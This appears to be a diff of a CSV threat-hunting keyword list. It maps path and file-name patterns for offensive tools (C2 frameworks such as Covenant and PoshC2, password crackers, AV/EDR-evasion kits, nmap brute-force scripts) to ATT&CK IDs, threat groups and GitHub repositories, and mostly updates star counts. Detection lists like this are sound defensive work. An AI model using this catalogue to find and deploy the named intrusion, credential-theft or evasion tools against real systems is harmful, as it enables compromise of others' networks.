-"*/OffensiveCSharp.git*","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*/OffensiveCSharp/*","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/OffensiveCSharp.git*","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/OffensiveCSharp/*","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/OffensiveNotion.git","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*/OffensiveNotion/agent*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*/OffensiveNotion/osxcross/target/bin*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*/OffensiveNotion/utils*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*/OG-Sadpanda/*","offensive_tool_keyword","cobaltstrike",".NET Assembly to Retrieve Outlook Calendar Details","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCalendar","1","1","N/A","10","10","13","1","2021-10-07T19:42:20Z","2021-10-07T17:11:46Z" "*/Oh365UserFinder*","offensive_tool_keyword","Oh365UserFinder","Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. or warn the user to increase timeouts between attempts.","T1595 - T1592 - T1589 - T1591 - T1598","TA0004 - TA0005 - TA0010","N/A","N/A","Reconnaissance","https://github.com/dievus/Oh365UserFinder","1","1","N/A","N/A","5","468","84","2023-03-21T15:59:54Z","2021-11-16T22:59:04Z" -"*/OJ/gobuster*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*/omg-payloads.git*","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*/OJ/gobuster*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*/omg-payloads.git*","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" "*/omp2-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/omp2-enum-targets.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/omron-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -4589,32 +4632,32 @@ "*/oneliner2.tpl*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*/onesixtyone/dict.txt*","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","1","N/A","N/A","5","416","86","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" "*/onex.git*","offensive_tool_keyword","onex","Onex is a package manager for hacker's. Onex manage more than 400+ hacking tools that can be installed on single click","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/onex","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/open_vas.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/open_vas.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/openbullet.git*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" -"*/OpenBullet2.git*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","424","2023-09-25T22:57:36Z","2020-04-23T14:04:16Z" +"*/OpenBullet2.git*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" "*/openflow-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/openlookup-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/openvas-otp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/openwebnet-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/opt/.exegol_aliases*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*/opt/chimera*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*/opt/chimera*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*/opt/cobaltstrike/logs*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" -"*/opt/Covenant/Covenant/*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*/opt/gocrack/files/engine*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" -"*/opt/gocrack/files/task*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/opt/Covenant/Covenant/*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/opt/gocrack/files/engine*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/opt/gocrack/files/task*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" "*/opt/icebreaker*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/opt/implant/*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" -"*/opt/lwp-scripts*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*/opt/lwp-wordlists*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*/opt/merlin/*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","57","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*/opt/lwp-scripts*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/opt/lwp-wordlists*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/opt/merlin/*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" "*/opt/nessus/*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*/opt/Ninja/*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/opt/Password_Cracking/*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" -"*/opt/PoshC2*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/opt/PoshC2*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*/opt/rai/*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*/opt/seclists/Discovery/*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*/optiv/Dent/*","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","1","N/A","10","10","296","51","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" -"*/optiv/Freeze/*","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1333","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" +"*/optiv/Freeze/*","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1334","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" "*/oracle-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/oracle-brute-stealth.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/oracle-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -4622,10 +4665,10 @@ "*/oracle-tns-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 